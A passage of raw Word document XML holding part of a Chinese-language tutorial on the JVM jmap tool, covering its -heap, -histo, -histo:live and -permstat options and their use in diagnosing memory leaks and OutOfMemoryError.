                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4610906" cy="4280271"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00917671">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4560901" cy="3601533"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="253" name="图片 3" descr="D:\用户目录\Documents\Tencent Files\57548991\Image\C2C\76QA}$G]IZ(78(HYM7DH22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用户目录\Documents\Tencent Files\57548991\Image\C2C\76QA}$G]IZ(78(HYM7DH22L.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId96" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4559529" cy="3600450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00F771FB" w:rsidRDefault="00634851" w:rsidP="00F771FB">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:ind w:left="405" w:firstLine="315"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参数如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-heap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：打印</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jvm heap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的情况</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>-histo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：打印</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jvm heap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的直方图。其输出信息包括类名，对象数量，对象占用大小。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>-histo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">live </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：同上，但是只答应存活对象的情况</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t>-permstat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：打印</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>permanent generation heap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>情况</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r w:rsidRPr="00887053">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00887053">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00887053">
        <w:t>jmap -permstat pid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00BF22A4" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>打印进程的类加载器和类加载器加载的持久代对象信息，输出：类加载器名称、对象是否存活（不可靠）、对象地址、父类加载器、已加载的类大小等信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="009F18E5" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7C5B">
        <w:t xml:space="preserve">jmap </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7C5B">
        <w:t>histo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="005E7C5B">
        <w:t>:live</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pid</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC2693">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F18E5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009F18E5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以观察</w:t>
      </w:r>
      <w:r w:rsidRPr="009F18E5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="009F18E5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中所有对象的情况（</w:t>
      </w:r>
      <w:r w:rsidRPr="009F18E5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="009F18E5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中所有生存的对象的情况）。包括对象数量和所占空间大小。</w:t>
      </w:r>
      <w:r w:rsidRPr="009F18E5">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jmap -histo java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进程中的所有实例、实例的个数，可用于</w:t>
      </w:r>
      <w:r w:rsidRPr="009832B7">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>查询单例对象是否真的只生成了一个实例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在控制台，输入命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“jmap -histo 7329 &gt; histo_dump”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，得到如下结果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00DE6CA5" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该命令通常用来分析内存泄漏</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OOM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通常做法是，首先配置</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>启动参数，让</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在遇到</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OutOfMemoryError</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时自动生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Dump</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00DE6CA5" w:rsidRDefault="00634851" w:rsidP="00634851">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="378" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6CA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
